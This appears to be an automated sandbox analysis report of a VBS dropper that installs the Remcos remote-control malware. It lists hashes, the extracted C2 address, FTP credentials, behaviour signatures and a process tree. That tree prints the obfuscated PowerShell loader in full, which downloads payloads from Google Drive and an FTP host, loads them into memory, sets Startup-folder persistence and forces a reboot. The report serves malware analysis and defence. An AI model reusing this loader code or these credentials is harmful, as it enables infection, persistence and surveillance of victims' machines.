Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
19-09-2024 01:48
General
-
Target
d81847976ea210269bf3c98c5b32d40ed9daf78dbb1a9ce638ac472e501647d2.vbs
-
Size
682KB
-
MD5
0044397fe549d182b1bfd55fd76e75eb
-
SHA1
3fa8cc3ec14dd1fff24affc7f2c19c9c92e4b663
-
SHA256
d81847976ea210269bf3c98c5b32d40ed9daf78dbb1a9ce638ac472e501647d2
-
SHA512
60f020faa2865f8086b36f82f6550179f8b442c5455fdd594fc7bd19e5ad9fe70bd023dac62724148747518e3123cdaf3a6ec986af6862543092796b2d984089
-
SSDEEP
1536:9SSSSSSSSSSSSSSSSSSSSSSSx222222222222222222222222222222222222229:d1n/DSw8ccar2
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
https://drive.google.com/uc?export=download&id=
Extracted
Credentials
Protocol: ftp- Host:
ftp.desckvbrat.com.br - Port:
21 - Username:
desckvbrat1 - Password:
developerpro21578Jp@@
Extracted
Family
remcos
Botnet
NedDay
C2
212.162.149.163:2404
Attributes
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
1210
-
mouse_option
false
-
mutex
Rmc-52K54M
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Blocklisted process makes network request 7 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 16 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 33 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d81847976ea210269bf3c98c5b32d40ed9daf78dbb1a9ce638ac472e501647d2.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9Ќз革DsЌз革KQЌз革gЌз革CkЌз革IЌз革Ќз革nЌз革GUЌз革dQByЌз革HQЌз革JwЌз革gЌз革CwЌз革IЌз革BlЌз革GoЌз革dwB6Ќз革GgЌз革JЌз革Ќз革gЌз革CwЌз革IЌз革Ќз革nЌз革GgЌз革dЌз革B0Ќз革HЌз革Ќз革cwЌз革6Ќз革C8Ќз革LwBrЌз革G8Ќз革bgBlЌз革HQЌз革bwB1Ќз革C0Ќз革ZQBtЌз革GEЌз革cgBrЌз革GUЌз革dЌз革BpЌз革G4Ќз革ZwЌз革uЌз革GMЌз革bwBtЌз革C8Ќз革egBzЌз革C4Ќз革dЌз革B4Ќз革HQЌз革JwЌз革gЌз革CgЌз革IЌз革BdЌз革F0Ќз革WwB0Ќз革GMЌз革ZQBqЌз革GIЌз革bwBbЌз革CЌз革Ќз革LЌз革Ќз革gЌз革GwЌз革bЌз革B1Ќз革G4Ќз革JЌз革Ќз革gЌз革CgЌз革ZQBrЌз革G8Ќз革dgBuЌз革EkЌз革LgЌз革pЌз革CЌз革Ќз革JwBJЌз革FYЌз革RgByЌз革HЌз革Ќз革JwЌз革gЌз革CgЌз革ZЌз革BvЌз革GgЌз革dЌз革BlЌз革E0Ќз革dЌз革BlЌз革EcЌз革LgЌз革pЌз革CcЌз革MQBzЌз革HMЌз革YQBsЌз革EMЌз革LgЌз革zЌз革HkЌз革cgBhЌз革HIЌз革YgBpЌз革EwЌз革cwBzЌз革GEЌз革bЌз革BDЌз革CcЌз革KЌз革BlЌз革HЌз革Ќз革eQBUЌз革HQЌз革ZQBHЌз革C4Ќз革KQЌз革gЌз革FoЌз革YwBCЌз革GMЌз革YQЌз革kЌз革CЌз革Ќз革KЌз革BkЌз革GEЌз革bwBMЌз革C4Ќз革bgBpЌз革GEЌз革bQBvЌз革EQЌз革dЌз革BuЌз革GUЌз革cgByЌз革HUЌз革QwЌз革6Ќз革DoЌз革XQBuЌз革GkЌз革YQBtЌз革G8Ќз革RЌз革BwЌз革HЌз革Ќз革QQЌз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革FsЌз革OwЌз革pЌз革CЌз革Ќз革KQЌз革gЌз革CcЌз革QQЌз革nЌз革CЌз革Ќз革LЌз革Ќз革gЌз革CcЌз革kyE6Ќз革JMhJwЌз革gЌз革CgЌз革ZQBjЌз革GEЌз革bЌз革BwЌз革GUЌз革UgЌз革uЌз革GcЌз革UwB6Ќз革EMЌз革QgBsЌз革CQЌз革IЌз革Ќз革oЌз革GcЌз革bgBpЌз革HIЌз革dЌз革BTЌз革DQЌз革NgBlЌз革HMЌз革YQBCЌз革G0Ќз革bwByЌз革EYЌз革OgЌз革6Ќз革F0Ќз革dЌз革ByЌз革GUЌз革dgBuЌз革G8Ќз革QwЌз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革FsЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革WgBjЌз革EIЌз革YwBhЌз革CQЌз革IЌз革BdЌз革F0Ќз革WwBlЌз革HQЌз革eQBCЌз革FsЌз革OwЌз革nЌз革CUЌз革SQBoЌз革HEЌз革UgBYЌз革CUЌз革JwЌз革gЌз革D0Ќз革IЌз革BlЌз革GoЌз革dwB6Ќз革GgЌз革JЌз革Ќз革7Ќз革CkЌз革IЌз革BnЌз革FMЌз革egBDЌз革EIЌз革bЌз革Ќз革kЌз革CЌз革Ќз革KЌз革BnЌз革G4Ќз革aQByЌз革HQЌз革UwBkЌз革GEЌз革bwBsЌз革G4Ќз革dwBvЌз革EQЌз革LgB4Ќз革GoЌз革cЌз革BzЌз革CQЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革7Ќз革DgЌз革RgBUЌз革FUЌз革OgЌз革6Ќз革F0Ќз革ZwBuЌз革GkЌз革ZЌз革BvЌз革GMЌз革bgBFЌз革C4Ќз革dЌз革B4Ќз革GUЌз革VЌз革Ќз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革FsЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革ZwBuЌз革GkЌз革ZЌз革BvЌз革GMЌз革bgBFЌз革C4Ќз革eЌз革BqЌз革HЌз革Ќз革cwЌз革kЌз革DsЌз革KQB0Ќз革G4Ќз革ZQBpЌз革GwЌз革QwBiЌз革GUЌз革VwЌз革uЌз革HQЌз革ZQBOЌз革CЌз革Ќз革dЌз革BjЌз革GUЌз革agBiЌз革E8Ќз革LQB3Ќз革GUЌз革TgЌз革oЌз革CЌз革Ќз革PQЌз革gЌз革HgЌз革agBwЌз革HMЌз革JЌз革Ќз革7Ќз革CkЌз革KЌз革BlЌз革HMЌз革bwBwЌз革HMЌз革aQBkЌз革C4Ќз革eЌз革BqЌз革HЌз革Ќз革cwЌз革kЌз革DsЌз革KQЌз革gЌз革CcЌз革dЌз革B4Ќз革HQЌз革LgЌз革xЌз革DЌз革Ќз革TЌз革BMЌз革EQЌз革LwЌз革xЌз革DЌз革Ќз革LwByЌз革GUЌз革dЌз革BwЌз革HkЌз革cgBjЌз革HЌз革Ќз革VQЌз革vЌз革HIЌз革YgЌз革uЌз革G0Ќз革bwBjЌз革C4Ќз革dЌз革BhЌз革HIЌз革YgB2Ќз革GsЌз革YwBzЌз革GUЌз革ZЌз革Ќз革uЌз革HЌз革Ќз革dЌз革BmЌз革EЌз革Ќз革MQB0Ќз革GEЌз革cgBiЌз革HYЌз革awBjЌз革HMЌз革ZQBkЌз革C8Ќз革LwЌз革6Ќз革HЌз革Ќз革dЌз革BmЌз革CcЌз革IЌз革Ќз革oЌз革GcЌз革bgBpЌз革HIЌз革dЌз革BTЌз革GQЌз革YQBvЌз革GwЌз革bgB3Ќз革G8Ќз革RЌз革Ќз革uЌз革HgЌз革agBwЌз革HMЌз革JЌз革Ќз革gЌз革D0Ќз革IЌз革BnЌз革FMЌз革egBDЌз革EIЌз革bЌз革Ќз革kЌз革DsЌз革KQЌз革nЌз革EЌз革Ќз革QЌз革BwЌз革EoЌз革OЌз革Ќз革3Ќз革DUЌз革MQЌз革yЌз革G8Ќз革cgBwЌз革HIЌз革ZQBwЌз革G8Ќз革bЌз革BlЌз革HYЌз革ZQBkЌз革CcЌз革LЌз革Ќз革pЌз革CkЌз革OQЌз革0Ќз革CwЌз革NgЌз革xЌз革DEЌз革LЌз革Ќз革3Ќз革DkЌз革LЌз革Ќз革0Ќз革DEЌз革MQЌз革sЌз革DgЌз革OQЌз革sЌз革DgЌз革MQЌз革xЌз革CwЌз革NwЌз革wЌз革DEЌз革LЌз革Ќз革5Ќз革DkЌз革LЌз革Ќз革1Ќз革DEЌз革MQЌз革sЌз革DEЌз革MЌз革Ќз革xЌз革CwЌз革MЌз革Ќз革wЌз革DEЌз革KЌз革BdЌз革F0Ќз革WwByЌз革GEЌз革aЌз革BjЌз革FsЌз革IЌз革BuЌз革GkЌз革bwBqЌз革C0Ќз革KЌз革Ќз革oЌз革GwЌз革YQBpЌз革HQЌз革bgBlЌз革GQЌз革ZQByЌз革EMЌз革awByЌз革G8Ќз革dwB0Ќз革GUЌз革TgЌз革uЌз革HQЌз革ZQBOЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革IЌз革B0Ќз革GMЌз革ZQBqЌз革GIЌз革bwЌз革tЌз革HcЌз革ZQBuЌз革CЌз革Ќз革PQЌз革gЌз革HMЌз革bЌз革BhЌз革GkЌз革dЌз革BuЌз革GUЌз革ZЌз革BlЌз革HIЌз革QwЌз革uЌз革HgЌз革agBwЌз革HMЌз革JЌз革Ќз革7Ќз革DgЌз革RgBUЌз革FUЌз革OgЌз革6Ќз革F0Ќз革ZwBuЌз革GkЌз革ZЌз革BvЌз革GMЌз革bgBFЌз革C4Ќз革dЌз革B4Ќз革GUЌз革VЌз革Ќз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革FsЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革ZwBuЌз革GkЌз革ZЌз革BvЌз革GMЌз革bgBFЌз革C4Ќз革eЌз革BqЌз革HЌз革Ќз革cwЌз革kЌз革DsЌз革KQB0Ќз革G4Ќз革ZQBpЌз革GwЌз革QwBiЌз革GUЌз革VwЌз革uЌз革HQЌз革ZQBOЌз革CЌз革Ќз革dЌз革BjЌз革GUЌз革agBiЌз革E8Ќз革LQB3Ќз革GUЌз革TgЌз革oЌз革CЌз革Ќз革PQЌз革gЌз革HgЌз革agBwЌз革HMЌз革JЌз革Ќз革7Ќз革GcЌз革UwB6Ќз革EMЌз革QgBsЌз革CQЌз革OwЌз革yЌз革DEЌз革cwBsЌз革FQЌз革OgЌз革6Ќз革F0Ќз革ZQBwЌз革HkЌз革VЌз革BsЌз革G8Ќз革YwBvЌз革HQЌз革bwByЌз革FЌз革Ќз革eQB0Ќз革GkЌз革cgB1Ќз革GMЌз革ZQBTЌз革C4Ќз革dЌз革BlЌз革E4Ќз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革CЌз革Ќз革PQЌз革gЌз革GwЌз革bwBjЌз革G8Ќз革dЌз革BvЌз革HIЌз革UЌз革B5Ќз革HQЌз革aQByЌз革HUЌз革YwBlЌз革FMЌз革OgЌз革6Ќз革F0Ќз革cgBlЌз革GcЌз革YQBuЌз革GEЌз革TQB0Ќз革G4Ќз革aQBvЌз革FЌз革Ќз革ZQBjЌз革GkЌз革dgByЌз革GUЌз革UwЌз革uЌз革HQЌз革ZQBOЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革7Ќз革H0Ќз革ZQB1Ќз革HIЌз革dЌз革Ќз革kЌз革HsЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革awBjЌз革GEЌз革YgBsЌз革GwЌз革YQBDЌз革G4Ќз革bwBpЌз革HQЌз革YQBkЌз革GkЌз革bЌз革BhЌз革FYЌз革ZQB0Ќз革GEЌз革YwBpЌз革GYЌз革aQB0Ќз革HIЌз革ZQBDЌз革HIЌз革ZQB2Ќз革HIЌз革ZQBTЌз革DoЌз革OgBdЌз革HIЌз革ZQBnЌз革GEЌз革bgBhЌз革E0Ќз革dЌз革BuЌз革GkЌз革bwBQЌз革GUЌз革YwBpЌз革HYЌз革cgBlЌз革FMЌз革LgB0Ќз革GUЌз革TgЌз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革FsЌз革ewЌз革gЌз革GUЌз革cwBsЌз革GUЌз革fQЌз革gЌз革GYЌз革LwЌз革gЌз革DЌз革Ќз革IЌз革B0Ќз革C8Ќз革IЌз革ByЌз革C8Ќз革IЌз革BlЌз革HgЌз革ZQЌз革uЌз革G4Ќз革dwBvЌз革GQЌз革dЌз革B1Ќз革GgЌз革cwЌз革gЌз革DsЌз革JwЌз革wЌз革DgЌз革MQЌз革gЌз革HЌз革Ќз革ZQBlЌз革GwЌз革cwЌз革nЌз革CЌз革Ќз革ZЌз革BuЌз革GEЌз革bQBtЌз革G8Ќз革YwЌз革tЌз革CЌз革Ќз革ZQB4Ќз革GUЌз革LgBsЌз革GwЌз革ZQBoЌз革HMЌз革cgBlЌз革HcЌз革bwBwЌз革DsЌз革IЌз革BlЌз革GMЌз革cgBvЌз革GYЌз革LQЌз革gЌз革CkЌз革IЌз革Ќз革nЌз革HЌз革Ќз革dQB0Ќз革HIЌз革YQB0Ќз革FMЌз革XЌз革BzЌз革G0Ќз革YQByЌз革GcЌз革bwByЌз革FЌз革Ќз革XЌз革B1Ќз革G4Ќз革ZQBNЌз革CЌз革Ќз革dЌз革ByЌз革GEЌз革dЌз革BTЌз革FwЌз革cwB3Ќз革G8Ќз革ZЌз革BuЌз革GkЌз革VwBcЌз革HQЌз革ZgBvЌз革HMЌз革bwByЌз革GMЌз革aQBNЌз革FwЌз革ZwBuЌз革GkЌз革bQBhЌз革G8Ќз革UgBcЌз革GEЌз革dЌз革BhЌз革EQЌз革cЌз革BwЌз革EEЌз革XЌз革Ќз革nЌз革CЌз革Ќз革KwЌз革gЌз革EYЌз革RwByЌз革FUЌз革QQЌз革kЌз革CЌз革Ќз革KЌз革Ќз革gЌз革G4Ќз革bwBpЌз革HQЌз革YQBuЌз革GkЌз革dЌз革BzЌз革GUЌз革RЌз革Ќз革tЌз革CЌз革Ќз革JwЌз革lЌз革EkЌз革aЌз革BxЌз革FIЌз革WЌз革Ќз革lЌз革CcЌз革IЌз革BtЌз革GUЌз革dЌз革BJЌз革C0Ќз革eQBwЌз革G8Ќз革QwЌз革gЌз革DsЌз革IЌз革B0Ќз革HIЌз革YQB0Ќз革HMЌз革ZQByЌз革G8Ќз革bgЌз革vЌз革CЌз革Ќз革dЌз革BlЌз革GkЌз革dQBxЌз革C8Ќз革IЌз革BRЌз革EEЌз革agB6Ќз革EkЌз革IЌз革BlЌз革HgЌз革ZQЌз革uЌз革GEЌз革cwB1Ќз革HcЌз革IЌз革BlЌз革HgЌз革ZQЌз革uЌз革GwЌз革bЌз革BlЌз革GgЌз革cwByЌз革GUЌз革dwBvЌз革HЌз革Ќз革IЌз革Ќз革7Ќз革CkЌз革JwB1Ќз革HMЌз革bQЌз革uЌз革G4Ќз革aQB3Ќз革HЌз革Ќз革VQBcЌз革CcЌз革IЌз革Ќз革rЌз革CЌз革Ќз革ZЌз革BJЌз革FIЌз革aQBNЌз革CQЌз革KЌз革Ќз革gЌз革D0Ќз革IЌз革BRЌз革EEЌз革agB6Ќз革EkЌз革OwЌз革pЌз革CЌз革Ќз革ZQBtЌз革GEЌз革TgByЌз革GUЌз革cwBVЌз革DoЌз革OgBdЌз革HQЌз革bgBlЌз革G0Ќз革bgBvЌз革HIЌз革aQB2Ќз革G4Ќз革RQBbЌз革CЌз革Ќз革KwЌз革gЌз革CcЌз革XЌз革BzЌз革HIЌз革ZQBzЌз革FUЌз革XЌз革Ќз革6Ќз革EMЌз革JwЌз革oЌз革CЌз革Ќз革PQЌз革gЌз革EYЌз革RwByЌз革FUЌз革QQЌз革kЌз革DsЌз革KQЌз革nЌз革HUЌз革cwBtЌз革C4Ќз革bgBpЌз革HcЌз革cЌз革BVЌз革FwЌз革JwЌз革gЌз革CsЌз革IЌз革BkЌз革EkЌз革UgBpЌз革E0Ќз革JЌз革Ќз革gЌз革CwЌз革QgBLЌз革EwЌз革UgBVЌз革CQЌз革KЌз革BlЌз革GwЌз革aQBGЌз革GQЌз革YQBvЌз革GwЌз革bgB3Ќз革G8Ќз革RЌз革Ќз革uЌз革HgЌз革aЌз革BKЌз革EgЌз革eQЌз革kЌз革DsЌз革OЌз革BGЌз革FQЌз革VQЌз革6Ќз革DoЌз革XQBnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgB0Ќз革HgЌз革ZQBUЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgB4Ќз革GgЌз革SgBIЌз革HkЌз革JЌз革Ќз革7Ќз革CkЌз革dЌз革BuЌз革GUЌз革aQBsЌз革EMЌз革YgBlЌз革FcЌз革LgB0Ќз革GUЌз革TgЌз革gЌз革HQЌз革YwBlЌз革GoЌз革YgBPЌз革C0Ќз革dwBlЌз革E4Ќз革KЌз革Ќз革gЌз革D0Ќз革IЌз革B4Ќз革GgЌз革SgBIЌз革HkЌз革JЌз革Ќз革7Ќз革H0Ќз革OwЌз革gЌз革CkЌз革JwB0Ќз革E8Ќз革TЌз革BjЌз革F8Ќз革SwBhЌз革DMЌз革WgBmЌз革G8Ќз革WЌз革Ќз革yЌз革EoЌз革SgByЌз革FYЌз革aЌз革BtЌз革FYЌз革OQBjЌз革G0Ќз革OQBYЌз革HMЌз革dQBYЌз革G0Ќз革agЌз革xЌз革GcЌз革MQЌз革nЌз革CЌз革Ќз革KwЌз革gЌз革EYЌз革YQBFЌз革FkЌз革UgЌз革kЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革RgBhЌз革EUЌз革WQBSЌз革CQЌз革ewЌз革gЌз革GUЌз革cwBsЌз革GUЌз革fQЌз革7Ќз革CЌз革Ќз革KQЌз革nЌз革DIЌз革NЌз革B1Ќз革FgЌз革SgBUЌз革HEЌз革YQBtЌз革GcЌз革eQBNЌз革HQЌз革RgB6Ќз革GEЌз革awBQЌз革FIЌз革MQBxЌз革F8Ќз革SQB2Ќз革EcЌз革aQBYЌз革E4Ќз革ZЌз革BxЌз革GEЌз革TgЌз革xЌз革CcЌз革IЌз革Ќз革rЌз革CЌз革Ќз革RgBhЌз革EUЌз革WQBSЌз革CQЌз革KЌз革Ќз革gЌз革D0AIABGAGEARQBZAFIAJAB7ACAAKQAgAFcAaQBpAEIAcwAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcwBuAGkAYQB0AG4AbwBDAC4ARQBSAFUAVABDAEUAVABJAEgAQwBSAEEAXwBSAE8AUwBTAEUAQwBPAFIAUAA6AHYAbgBlACQAIAA9ACAAVwBpAGkAQgBzACQAOwAnAD0AZABpACYAZABhAG8AbABuAHcAbwBkAD0AdAByAG8AcAB4AGUAPwBjAHUALwBtAG8AYwAuAGUAbABnAG8AbwBnAC4AZQB2AGkAcgBkAC8ALwA6AHMAcAB0AHQAaAAnACAAPQAgAEYAYQBFAFkAUgAkADsAKQAgACcAdQBzAG0ALgBuAGkAdwBwAFUAXAAnACAAKwAgAGQASQBSAGkATQAkACAAKAAgAGwAZQBkADsAKQAoAGgAdABhAFAAcABtAGUAVAB0AGUARwA6ADoAXQBoAHQAYQBQAC4ATwBJAC4AbQBlAHQAcwB5AFMAWwAgAD0AIABkAEkAUgBpAE0AJAB7ACAAKQAgAEYAZABNAFEAVAAkACAAKAAgAGYAaQA7ACAAKQAyACgAcwBsAGEAdQBxAEUALgByAG8AagBhAE0ALgBuAG8AaQBzAHIAZQBWAC4AdABzAG8AaAAkACAAPQAgAEYAZABNAFEAVAAkACAAOwA=';$nQCfu = $qKKzc.replace('Ќз革' , 'A') ;$IedxR = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nQCfu ) ); $IedxR = $IedxR[-1..-$IedxR.Length] -join '';$IedxR = $IedxR.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\d81847976ea210269bf3c98c5b32d40ed9daf78dbb1a9ce638ac472e501647d2.vbs');powershell $IedxR2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $TQMdF = $host.Version.Major.Equals(2) ;if ( $TQMdF ) {$MiRId = [System.IO.Path]::GetTempPath();del ( $MiRId + '\Upwin.msu' );$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yHJhx = (New-Object Net.WebClient);$yHJhx.Encoding = [System.Text.Encoding]::UTF8;$yHJhx.DownloadFile($URLKB, $MiRId + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MiRId + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\d81847976ea210269bf3c98c5b32d40ed9daf78dbb1a9ce638ac472e501647d2.vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$spjx = (New-Object Net.WebClient);$spjx.Encoding = [System.Text.Encoding]::UTF8;$spjx.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $spjx.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$spjx.dispose();$spjx = (New-Object Net.WebClient);$spjx.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $spjx.DownloadString( $lBCzSg );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\d81847976ea210269bf3c98c5b32d40ed9daf78dbb1a9ce638ac472e501647d2.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.sz/moc.gnitekrame-uotenok//:sptth' , $hzwje , 'true' ) );};"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"4⤵
- Adds Run key to start application
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\bgoyg.ps1"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\d81847976ea210269bf3c98c5b32d40ed9daf78dbb1a9ce638ac472e501647d2.vbs"4⤵
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD50423d1c3644008ec26cc67c82bc8299b
SHA1bf4b7a9bc3ce4b1b464c3bf213e97f84c8567b6d
SHA25697f17ce67e96456bb4a03163a212a3f72a64deeb0a5db91223e84b0de30626ed
SHA51225adc3bee35ad0879a6798fec7e2cec19a3ec229538f9e120cecf53cd77f3895947bb31e59489aa5ff19ee0160dbaeed851a7b94d61da2bd4f96fa6f9a7cfe61
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
1.7MB
MD5f0998e9b4f7c32742747da171ca09c73
SHA18ea10535e6532b6719c602cd72fabf9ee8eb31df
SHA256a329a0f04566272a641c1711c66fd62099bf1eb62a9adc55745ec271e3cca9c2
SHA5125a20e2564e2c9935f5c8aff1938076333752365628f1a71937f9b194f7489b7305d496087d88676ea27ae6164a3b1e39aa9fc265af863d470d5d58a61b6ab237
-
Filesize
334B
MD54eda6e2997d192a2d013c6483fd8167a
SHA1cc71435944fda3933ac2a55d8ca37ea3313939f9
SHA25692e5dadb539a7661346ee4a0e9b7e37b2bf9f416ccbd361b1e4020fae981e149
SHA512da934abdb29948ab6f0ccd0446bd9dd2fcdd5b45aa9b0b5271eb3ffa17b0473625d4f01bd6673b7e0cd66ca80fdb690e7947d341108e988276074f6f87fd1c9b
-
Filesize
1KB
MD5c2591b8d3c298836fc77aeec431b0a88
SHA156aed0d369ac0a912275f1d29075c78da932e2a7
SHA256bfca64476080417d90c94877309a740be930c08c7d60bd2579ff9b523b4d9c9f
SHA51295162e3fd633a27db36565cacc0c6e0ce220e080ca402849238cf4db42ed19772959c4d664a82cfbfeceac4271d49a0f1f5a2c0edceecbd100d7f7797a5211c8
-
Filesize
948B
MD5217d9191dfd67252cef23229676c9eda
SHA180d940b01c28e3933b9d68b3e567adc2bac1289f
SHA256e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133
SHA51286767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
40KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
